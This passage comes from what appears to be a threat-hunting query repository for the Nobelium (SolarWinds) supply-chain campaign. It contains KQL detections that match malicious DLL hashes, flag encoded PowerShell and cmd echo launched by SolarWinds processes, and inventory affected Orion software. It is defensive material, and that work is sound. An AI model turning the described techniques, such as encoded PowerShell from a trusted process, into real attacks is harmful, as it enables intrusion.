'7b59090b78127381593460ccea2ea64d6c5838cd8cb0e97c5e436ae58e69cdee', 'e7046b7eac25ceb5274c815aba4384099524eacf9aed683179aa29ac5f45ede8', '38c1cab0a8c9870f2cc7cfa5f3f782c0bb8ede94ce89a41a5e9509a79d7fdf5e', '393cd1ecf955d6938f9a9ba65808a209e7741e2fd17baa91e4960aca799be86f', '681b1b85a0f8a7ede2c6bf8c71ad4cb56ccc4e1bb400783c93ee9b5ab76d3da6', 'd104de2912949e598f12b2b517bdbec17896cee8305766e72bbb4e604205b2b4', 'eb7bada29bcf4c6b94f7ab710a8a6702f26845c9678826ff0dfc7494a5e8186d', '4a5f1df73581c531e62e73fe1ab374d1d93b3846d8e6b80833fd295e0fbc23f1', '895d49db09b64f15782073d4ff4a0fe21cd91f9b9fa9902053278799313b13b1', '99b622046fb5e122a6f2dadad0858cdd1056582701fb0968c57ec6171dc4c0ee', '8f79942feb0c8533ce01f867902f4a72d328681249fd474b0215e9d9b4477f67', '948f9fc9b5979fb66e91964bb2bee0b42b7e8f6b6436188fee9fb69b676d2f42', '356266255b6aa6ba096cd8048a6a43488ffc21845430d7d0f798fd9022879377', '4e35c7d135bd7f55cdec68d7acf176ae84b850e927fdffb005e000fef5b35a21', '609aa1b6ebbeb93a76898219ad470832c4dd838fb3214989841af8b90fcef695', '5e0fb8cab745678487ac1ed99b5ec2fa2d54a65cbf0e2cb9208785200f2c2b8b', 'aa4349b6531544093c4dbc1d2a7b8680d3308cbde313a38c27cd211dd80ee9d1', 'f0a59a724ee6631b7f2ae88aa9ec7c24a82f8c912512352d93d058a928c33c70', '1cf5710e500a423b84b51fa3afdd923fe0a8255c5817d3238175623e2ebbfad9', '959be603c11951ead9c13efd0451ba23e743ec3019562f7715c5b0306ae70537', '0cb570e4e5229dbe488bba92f57b5951a69335dd625aa6ada0ccb34c918613b2', '60d3a8c8a7e8bdb67a44ad4f220e52593bf46d2ce6e8d40b6db9045c68cee413', '71b11d28dec1dadc738c4b993dba32e3c33a85421de66120be62f3ec0ed50c3e', 'b6ef03aec5d10e371f0b06c661036d838ef55fa7dc75cf91fca3622bdefa8140', '791cb9883187ada5274c976a2e05dc756c48eda88fabdfe2eb7e19f59f0182e5', '1ba2ef33e69d6bc03ba02a68ecd701b1eee6a33aabd44509e3b344d0948cf9f4', '1353ffc96e0a701fa8b3dc2835a8be6199e3c8f079663ebffb6b665750ef8af9', '2effc706d002ebf5c18160ba1cec9f88adbc4a36a3daaf5dbacc8c0dd6ad46b6', 'd13ec5610c22bad31a47b59791b6e964d4703b4019094fd44c8151ee802db7ea', '3ac5a8f9f2f80b7a8b5267a5cd523dd449b2de5ccb7b30e448ef0dcfc8995506', 'c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93', '899ad5af2b4ad14fa58612dc2938598ac7e892d759659aef87e4db46d70f62bf', 'e1d466b44e0dffafe4a2d0ebade37ea5f9b6a30ccf16f59d4d2e32f9204a03f8', 'a022820a62198fa3e3b89749b38db1cc3a09136524682fb99a3ce36652725065', '3c9a7aa8cc4fd0538532e757a756709897c94b2653152a40993c7d0a47503980', '6c8f967b12cf84eed7b8c039e04614e50cd7fcd8ca9e01563bb6f5f0a11dcb8c', 'bb4229d4fe06209fc7c8ed44da8f353dcb980b5f1a5229c7e1f17b772ff8fd8c', 'e2f7afedf6dbeaeae60a1434a8735acd426087fd16689b29b869ebe88cdbef85', '504be292cf783ce6cb0c356034e69b76a465ec534386a776663810266d64da33', '42389f51dc60590c2daab696e8782c3f4dd9f9a4c98a3b987e10d43174deba38', 'eec42b1fb5275eaf3e0229db99421e2b16a3c82bb64da3305662622dc2d6e07a', '33b8b7198b8e9a24b415d280d673cfa4efe4d249ac9e21703a61c65dc0933d74', 'c91e8e5c2491f7708c4e550c18acab121e1b245ade7b2abb79cdd25b8a9cf379', 'b292ae784ab91b99cc2b8f5cc173813cdb52fb75c6dab85bd1ce05a244b85fca', '629c0a325f24016534ebc2e0578068593ca883557f8c10cc1ae4d5b0ab91bfec', 'bc6d23e865cdbc4d57451e80797be2b2feff531ca2743c533e5d114c3a19433d', '7b1e06cf7c362e62b156652b069a4ca1800e0ab72730636f64cc24dabd3830a8', 'cc9da7fce451e409a4d994b4675db6a3651a551b9a004461d14a3d3532765d84' ] ); DeviceFileEvents | where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash) | union DeviceImageLoadEvents | where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | v | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Dario Brambilla **GitHub alias:** darioongit **Organization:** Microsoft 365 Defender ================================================ FILE: Campaigns/known-affected-software-orion[Nobelium].md ================================================ # View data on software identified as affected by Nobelium campaign This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query searches Threat and Vulnerability Management (TVM) data for Orion software known to be affected by the Nobelium campaign. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceTvmSoftwareVulnerabilities | where CveId == 'TVM-2020-0002' | project DeviceId, DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/launching-base64-powershell[Nobelium].md ================================================ # Locate SolarWinds processes launching suspicious PowerShell commands This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query detects events when SolarWinds processes launched PowerShell commands that were possibly encoded in Base64. Attackers may encode PowerShell commands in Base64 to obfuscate malicious activity. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe" | where FileName =~ "powershell.exe" // Extract base64 encoded string, ensure valid base64 length | extend base64_extracted = extract('([A-Za-z0-9+/]{20,}[=]{0,3})', 1, ProcessCommandLine) | extend base64_extracted = substring(base64_extracted, 0, (strlen(base64_extracted) / 4) * 4) | extend base64_decoded = replace(@'\0', '', make_string(base64_decode_toarray(base64_extracted))) // | where notempty(base64_extracted) and base64_extracted matches regex '[A-Z]' and base64_extracted matches regex '[0-9]' ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/launching-cmd-echo[Nobelium].md ================================================ # Locate SolarWinds processes launching command prompt with the echo command This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query detects events when SolarWinds processes attempted to launch the [cmd.exe](https://docs.microsoft.com/windows-server/administration/windows-commands/cmd) command prompt using the `echo` command. Using `echo` in this way is suspicious, as it is an indirect way of issuing commands, and may not be readily detected by certain kinds of security solutions. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceProcessEvents | where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe" | where FileName == "cmd.exe" and ProcessCommandLine has "echo" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/locate-dll-created-locally[Nobelium].md ================================================ # Locate Nobelium-related malicious DLLs created in the system or locally This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/). Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers. The following query locates malicious Nobelium-associated DLLs that have been created in the system or locally. More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document. ## Query ```kusto DeviceFileEvents | where SHA1 in ("76640508b1e7759e548771a5359eaed353bf1eec","d130bd75645c2433f88ac03e73395fba172ef676","1acf3108bf1e376c8848fbb25dc87424f2c2a39c","e257236206e99f5a5c62035c9c59c57206728b28","6fdd82b7ca1c1f0ec67c05b36d14c9517065353b","2f1a5a7411d015d01aaee4535835400191645023","bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387","16505d0b929d80ad1680f993c02954cfd3772207","d8938528d68aabe1e31df485eb3f75c8a925b5d9","395da6d4f3c890295f7584132ea73d759bd9d094","c8b7f28230ea8fbf441c64fdd3feeba88607069e","2841391dfbffa02341333dd34f5298071730366a","2546b0e82aecfe987c318c7ad1d00f9fa11cd305","2dafddbfb0981c5aa31f27a298b9c804e553c7bc","e2152737bed988c0939c900037890d1244d9a30e","fd15760abfc0b2537b89adc65b1ff3f072e7e31c") or SHA256 in ("32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77","ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6","dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b","eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed","ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c","019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134","c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77","0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589","e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d","20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9","2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d","a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d","92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690","a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2","b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666","cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6","ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8") ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | v | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | v | | ## See also * [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md) * [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md) * [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md) * [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md) * [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md) * [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md) * [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md) * [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md) * [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md) * [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md) * [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md) * [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md) * [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md) * [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md) * [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md) * [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md) * [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md) * [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md) * [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md) * [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md) * [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md) * [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md) * [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md) * [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md) * [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Campaigns/locate-dll-loaded-in-memory[Nobelium].md ================================================ # Locate Nobelium-related malicious DLLs loaded in memory This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*. Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as 